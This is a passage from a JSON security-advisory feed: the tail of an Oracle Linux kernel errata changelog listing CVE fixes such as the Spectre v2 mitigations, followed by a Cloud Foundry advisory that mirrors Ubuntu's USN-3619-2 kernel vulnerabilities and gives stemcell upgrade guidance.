{CVE-2017-16527}\n- HID: usbhid: fix out-of-bounds bug (Jaejoong Kim) [Orabug: 27207929] {CVE-2017-16533}\n- [media] cx231xx-cards: fix NULL-deref on missing association descriptor (Johan Hovold) [Orabug: 27208072] {CVE-2017-16536}\n- net: cdc_ether: fix divide by 0 on bad descriptors (Bjorn Mork) [Orabug: 27215201] {CVE-2017-16649}\n- x86/microcode/intel: Extend BDW late-loading with a revision check (Jia Zhang) [Orabug: 27343577] \n- x86/microcode/intel: Disable late loading on model 79 (Borislav Petkov) [Orabug: 27343577] \n- Bluetooth: bnep: bnep_add_connection() should verify that its dealing with l2cap socket (Al Viro) [Orabug: 27344793] {CVE-2017-15868}\n- Bluetooth: hidp: verify l2cap sockets (David Herrmann) [Orabug: 27344793] {CVE-2017-15868}\n- ALSA: pcm: prevent UAF in snd_pcm_info (Robb Glasser) [Orabug: 27344843] {CVE-2017-0861} {CVE-2017-0861}\n- ptrace: use fsuid, fsgid, effective creds for fs access checks (Jann Horn) [Orabug: 27364691] {CVE-2017-14140}\n- sctp: do not peel off an assoc from one netns to another one (Xin Long) [Orabug: 27387001] {CVE-2017-15115}\n- Revert 'x86/spec_ctrl: Add 'nolfence' knob to disable fallback for spectre_v2 mitigation' (Ankur Arora) [Orabug: 27601787] {CVE-2017-5715}\n- Revert 'x86/spec: Add 'lfence_enabled' in sysfs' (Ankur Arora) [Orabug: 27601787] {CVE-2017-5715}\n- Revert 'x86/mitigation/spectre_v2: Add reporting of 'lfence'' (Ankur Arora) [Orabug: 27601787] {CVE-2017-5715}\n- x86/mitigation/spectre_v2: Add reporting of 'lfence' (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- x86/spec: Add 'lfence_enabled' in sysfs (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- x86/spec_ctrl: Add 'nolfence' knob to disable fallback for spectre_v2 mitigation (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- x86/spectre: bring spec_ctrl management logic closer to UEK4 (Ankur Arora) [Orabug: 27516512] {CVE-2017-5715}\n- x86/cpufeatures: Clean up Spectre v2 related CPUID flags (David Woodhouse) [Orabug: 27516357] {CVE-2017-5715}\n- 
x86/spectre_v2: Remove 0xc2 from spectre_bad_microcodes (Darren Kenny) [Orabug: 27516419] {CVE-2017-5715}\n- x86/cpufeature: Blacklist SPEC_CTRL/PRED_CMD on early Spectre v2 microcodes (David Woodhouse) [Orabug: 27516419] {CVE-2017-5715}\n- x86: intel-family.h: Add GEMINI_LAKE SOC (Len Brown) [Orabug: 27516419] \n- x86/cpu/intel: Introduce macros for Intel family numbers (Dave Hansen) [Orabug: 27516419] \n- x86/spectre: expose 'stibp' (Konrad Rzeszutek Wilk) [Orabug: 27516419] {CVE-2017-5715}\n- x86/speculation: Add basic IBPB (Indirect Branch Prediction Barrier) support (David Woodhouse) [Orabug: 27516379] {CVE-2017-5715}\n- x86/speculation: Use Indirect Branch Prediction Barrier in context switch (Tim Chen) [Orabug: 27516379] {CVE-2017-5715}\n- x86/spectre: fix spectre_v1 mitigation indicators (Ankur Arora) [Orabug: 27509932] {CVE-2017-5715}\n- x86/ia32/syscall: Clear extended registers %r8-%r15 (Ankur Arora) [Orabug: 27452028] {CVE-2017-5715}\n- x86/ia32/syscall: Save full stack frame throughout the entry code (Ankur Arora) [Orabug: 27452028] {CVE-2017-5715}\n- x86/ia32/syscall: cleanup trailing whitespace (Ankur Arora) [Orabug: 27452028] {CVE-2017-5715}\n- x86/syscall: Clear callee saved registers (%r12-%r15, %rbp, %rbx) (Ankur Arora) [Orabug: 27452028] {CVE-2017-5715}\n- x86/syscall: Save callee saved registers on syscall entrance (Ankur Arora) [Orabug: 27452028] {CVE-2017-5715}", "edition": 4, "modified": "2018-05-02T00:00:00", "published": "2018-05-02T00:00:00", "id": "ELSA-2018-4089", "href": "http://linux.oracle.com/errata/ELSA-2018-4089.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:46", "bulletinFamily": "software", "cvelist": ["CVE-2018-8043", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-16913", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-17862", "CVE-2017-18075", "CVE-2017-0861", "CVE-2017-7518", 
"CVE-2017-18203", "CVE-2017-17805", "CVE-2017-16912", "CVE-2017-16532", "CVE-2017-16649", "CVE-2017-16995", "CVE-2017-11472", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2018-6927", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-16536", "CVE-2017-1000407", "CVE-2017-18208", "CVE-2017-16911", "CVE-2018-7492", "CVE-2018-5332", "CVE-2017-17449", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16528", "CVE-2017-16914", "CVE-2017-16645", "CVE-2017-17806"], "description": "# \n\n# Severity\n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3619-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nJann Horn discovered that the Berkeley Packet Filter (BPF) implementation in the Linux kernel improperly performed sign extension in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16995)\n\nIt was discovered that a race condition leading to a use-after-free vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel allowed passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM could use this to cause a denial of service (system crash) in the host OS. (CVE-2017-1000407)\n\nIt was discovered that an information disclosure vulnerability existed in the ACPI implementation of the Linux kernel. A local attacker could use this to expose sensitive information (kernel memory addresses). 
(CVE-2017-11472)\n\nIt was discovered that a use-after-free vulnerability existed in the network namespaces implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-15129)\n\nIt was discovered that the Advanced Linux Sound Architecture (ALSA) subsystem in the Linux kernel contained a use-after-free when handling device removal. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16528)\n\nAndrey Konovalov discovered that the usbtest device driver in the Linux kernel did not properly validate endpoint metadata. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-16532)\n\nAndrey Konovalov discovered that the Conexant cx231xx USB video capture driver in the Linux kernel did not properly validate interface descriptors. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-16536)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the Linux kernel did not properly validate device metadata. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB driver in the Linux kernel did not properly validate device descriptors. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in the Linux kernel did not properly handle detach events. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-16646)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not properly validate device descriptors. 
A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not properly validate device descriptors. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-16650)\n\nIt was discovered that the USB Virtual Host Controller Interface (VHCI) driver in the Linux kernel contained an information disclosure vulnerability. A physically proximate attacker could use this to expose sensitive information (kernel memory). (CVE-2017-16911)\n\nIt was discovered that the USB over IP implementation in the Linux kernel did not validate endpoint numbers. A remote attacker could use this to cause a denial of service (system crash). (CVE-2017-16912)\n\nIt was discovered that the USB over IP implementation in the Linux kernel did not properly validate CMD_SUBMIT packets. A remote attacker could use this to cause a denial of service (excessive memory consumption). (CVE-2017-16913)\n\nIt was discovered that the USB over IP implementation in the Linux kernel contained a NULL pointer dereference error. A remote attacker could use this to cause a denial of service (system crash). (CVE-2017-16914)\n\nIt was discovered that the HugeTLB component of the Linux kernel did not properly handle holes in hugetlb ranges. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux kernel did not properly restrict access to the connection tracking helpers list. A local attacker could use this to bypass intended access restrictions. (CVE-2017-17448)\n\nIt was discovered that the netlink subsystem in the Linux kernel did not properly restrict observations of netlink messages to the appropriate net namespace. A local attacker could use this to expose sensitive information (kernel netlink traffic). 
(CVE-2017-17449)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf) module did not properly perform access control checks. A local attacker could improperly modify the system-wide OS fingerprint list. (CVE-2017-17450)\n\nIt was discovered that the core USB subsystem in the Linux kernel did not validate the number of configurations and interfaces in a device. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-17558)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel contained an out-of-bounds read when handling memory-mapped I/O. A local attacker could use this to expose sensitive information. (CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm implementations in the Linux kernel did not properly handle zero-length inputs. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the state of the underlying cryptographic hash algorithm. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel did not properly check permissions when a key request was performed on a task\u2019s default keyring. A local attacker could use this to add keys to unauthorized keyrings. (CVE-2017-17807)\n\nAlexei Starovoitov discovered that the Berkeley Packet Filter (BPF) implementation in the Linux kernel contained a branch-pruning logic issue around unreachable code. A local attacker could use this to cause a denial of service. (CVE-2017-17862)\n\nIt was discovered that the parallel cryptography component of the Linux kernel incorrectly freed kernel memory. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. 
(CVE-2017-18075)\n\nIt was discovered that a race condition existed in the Device Mapper component of the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-18203)\n\nIt was discovered that a race condition existed in the OCFS2 file system implementation in the Linux kernel. A local attacker could use this to cause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that an infinite loop could occur in the madvise(2) implementation in the Linux kernel in certain circumstances. A local attacker could use this to cause a denial of service (system hang). (CVE-2017-18208)\n\nAndy Lutomirski discovered that the KVM implementation in the Linux kernel was vulnerable to a debug exception error when single-stepping through a syscall. A local attacker in a non-Linux guest vm could possibly use this to gain administrative privileges in the guest vm. (CVE-2017-7518)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the Linux kernel did not properly validate Generic Segment Offload (GSO) packet sizes. An attacker could use this to cause a denial of service (interface unavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS) implementation in the Linux kernel contained an out-of-bounds write during RDMA page allocation. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-5332)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable Datagram Sockets) protocol implementation of the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-5333)\n\n\u8303\u9f99\u98de discovered that a race condition existed in the loop block device implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. 
(CVE-2018-5344)\n\nIt was discovered that an integer overflow error existed in the futex implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-6927)\n\nIt was discovered that a NULL pointer dereference existed in the RDS (Reliable Datagram Sockets) protocol implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-7492)\n\nIt was discovered that the Broadcom UniMAC MDIO bus controller driver in the Linux kernel did not properly validate device resources. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-8043)\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3363.x versions prior to 3363.53\n * 3421.x versions prior to 3421.46\n * 3445.x versions prior to 3445.32\n * 3468.x versions prior to 3468.30\n * 3541.x versions prior to 3541.12\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3363.x versions to 3363.53\n * Upgrade 3421.x versions to 3421.46\n * Upgrade 3445.x versions to 3445.32\n * Upgrade 3468.x versions to 3468.30\n * Upgrade 3541.x versions to 3541.12\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * [USN-3619-2](<https://usn.ubuntu.com/3619-2/>)\n * [CVE-2017-0861](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-0861>)\n * [CVE-2017-1000407](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-1000407>)\n * [CVE-2017-11472](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-11472>)\n * [CVE-2017-15129](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-15129>)\n * 
[CVE-2017-16528](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16528>)\n * [CVE-2017-16532](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16532>)\n * [CVE-2017-16536](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16536>)\n * [CVE-2017-16537](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16537>)\n * [CVE-2017-16645](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16645>)\n * [CVE-2017-16646](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16646>)\n * [CVE-2017-16649](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16649>)\n * [CVE-2017-16650](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16650>)\n * [CVE-2017-16911](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16911>)\n * [CVE-2017-16912](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16912>)\n * [CVE-2017-16913](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16913>)\n * [CVE-2017-16914](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16914>)\n * [CVE-2017-16994](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16994>)\n * [CVE-2017-16995](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16995>)\n * [CVE-2017-17448](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17448>)\n * [CVE-2017-17449](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17449>)\n * [CVE-2017-17450](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17450>)\n * [CVE-2017-17558](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17558>)\n * [CVE-2017-17741](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17741>)\n * [CVE-2017-17805](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17805>)\n * [CVE-2017-17806](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17806>)\n * [CVE-2017-17807](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17807>)\n * 
[CVE-2017-17862](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17862>)\n * [CVE-2017-18075](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-18075>)\n * [CVE-2017-18203](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-18203>)\n * [CVE-2017-18204](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-18204>)\n * [CVE-2017-18208](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-18208>)\n * [CVE-2017-7518](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-7518>)\n * [CVE-2018-1000026](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-1000026>)\n * [CVE-2018-5332](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-5332>)\n * [CVE-2018-5333](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-5333>)\n * [CVE-2018-5344](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-5344>)\n * [CVE-2018-6927](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-6927>)\n * [CVE-2018-7492](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-7492>)\n * [CVE-2018-8043](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-8043>)\n", "edition": 5, "modified": "2018-05-02T00:00:00", "published": "2018-05-02T00:00:00", "id": "CFOUNDRY:E36E8558D6E84664F9D34B4A9E5179AC", "href": "https://www.cloudfoundry.org/blog/usn-3619-2/", "title": "USN-3619-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}